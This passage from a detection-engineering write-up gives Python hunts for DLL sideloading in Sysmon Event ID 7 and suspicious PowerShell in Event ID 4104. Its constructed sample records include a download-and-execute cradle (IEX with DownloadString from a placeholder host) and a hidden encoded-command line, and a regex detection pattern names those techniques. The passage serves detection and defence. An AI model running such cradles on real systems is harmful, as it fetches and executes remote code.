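    for alert in correlate_consent_to_credentials(AUDIT_EVENTS):
        print("CONSENT->CREDENTIAL", alert)
    for s in flag_device_code_signins(SIGNIN_EVENTS):
        print("DEVICE-CODE OUTSIDE BASELINE", s["user"], s["country"], s["time"])
```

<p>On the sample data the first function raises one alert (the Mail Sync Helper pair, 6.47 hours apart, matched on user) and ignores the admin pair because it falls outside the 24-hour window; the second flags only the jdoe device-code sign-in, since that account has no documented kiosk role. In production the same logic runs over a real export, and the baseline dictionary is the place to record which accounts legitimately use device-code flow, which is also the list the Conditional Access exemption should be limited to.</p>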
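<p>Two of the endpoint hunts from Detection Priorities 3 and 4 above (Sysmon Event ID 7 for DLLs loaded from user-writable directories by signed executables, and PowerShell Script Block Logging Event ID 4104 for encoded commands, Invoke-Expression, DownloadString and Base64 patterns), as an added Python example that is not part of the Anomali report. The field names follow the Sysmon and PowerShell operational log fields (Image, ImageLoaded, Signed, ScriptBlockText), but every event record is constructed, and the set of user-writable directory markers is an assumption to tune per build.</p>

```python
"""Endpoint hunts for signed-binary DLL sideloading and suspicious PowerShell.

Added example, not part of the Anomali report. Runs two checks over constructed
event records: (1) Sysmon Event ID 7 where a signed image loads a DLL from a
user-writable directory, and (2) PowerShell Event ID 4104 script text matching
the encoded-command / IEX / DownloadString / Base64 patterns the report lists.
"""
import re

# Path fragments treated as user-writable (assumption; extend for your builds).
USER_WRITABLE_MARKERS = ("\\users\\", "\\programdata\\", "\\temp\\")

SUSPICIOUS_POWERSHELL = re.compile(
    r"invoke-expression|\biex\b|downloadstring|-enc(odedcommand)?\b|frombase64string",
    re.IGNORECASE,
)

# Constructed Sysmon Event ID 7 (Image Loaded) records.
IMAGE_LOAD_EVENTS = [
    # Signed viewer dropped into %TEMP% pulling its DLL from the same folder: the sideload pattern.
    {"EventID": 7, "Image": r"C:\Users\jdoe\AppData\Local\Temp\update\viewer.exe",
     "ImageLoaded": r"C:\Users\jdoe\AppData\Local\Temp\update\core.dll", "Signed": "true"},
    # Same product installed normally: DLL from Program Files, benign.
    {"EventID": 7, "Image": r"C:\Program Files\Viewer\viewer.exe",
     "ImageLoaded": r"C:\Program Files\Viewer\core.dll", "Signed": "true"},
    # User-profile executable loading a system DLL: not the pattern we hunt here.
    {"EventID": 7, "Image": r"C:\Users\jdoe\AppData\Roaming\tool\tool.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true"},
    # Unsigned loader: left to other rules, since the report's hunt is signed binaries.
    {"EventID": 7, "Image": r"C:\Users\jdoe\Downloads\setup.exe",
     "ImageLoaded": r"C:\Users\jdoe\Downloads\helper.dll", "Signed": "false"},
]

# Constructed PowerShell Event ID 4104 (Script Block Logging) records.
SCRIPT_BLOCK_EVENTS = [
    {"EventID": 4104, "ScriptBlockText": "Get-ChildItem C:\\logs | Measure-Object"},
    {"EventID": 4104, "ScriptBlockText":
        "IEX (New-Object Net.WebClient).DownloadString('hxxp://placeholder.invalid/stage.ps1')"},
    {"EventID": 4104, "ScriptBlockText": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAA=="},
]


def is_user_writable(path):
    """True when the path sits under a directory an unprivileged user can write to."""
    lowered = path.lower()
    return any(marker in lowered for marker in USER_WRITABLE_MARKERS)


def find_sideload_candidates(events):
    """Sysmon 7 events where a signed image loads a DLL from a user-writable path."""
    return [
        e for e in events
        if e["EventID"] == 7 and e["Signed"] == "true" and is_user_writable(e["ImageLoaded"])
    ]


def find_suspicious_script_blocks(events):
    """4104 events whose script text matches the patterns the report lists."""
    return [
        e for e in events
        if e["EventID"] == 4104 and SUSPICIOUS_POWERSHELL.search(e["ScriptBlockText"])
    ]


if __name__ == "__main__":
    for e in find_sideload_candidates(IMAGE_LOAD_EVENTS):
        print("SIDELOAD CANDIDATE", e["Image"], "->", e["ImageLoaded"])
    for e in find_suspicious_script_blocks(SCRIPT_BLOCK_EVENTS):
        print("SUSPICIOUS 4104", e["ScriptBlockText"][:60])
```

<p>On the sample records the sideload check returns only the %TEMP% viewer loading core.dll; the Program Files install and the System32 load are left alone, which is the false-positive shape to expect from real fleets. The script-block check returns the IEX/DownloadString line and the -enc line and passes the benign Get-ChildItem pipeline. Both functions are deliberately narrow so they can be read against the corresponding bullet in the Detection Priorities list; a production rule would add the Sysmon SignatureStatus and process lineage fields to cut noise further.</p>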
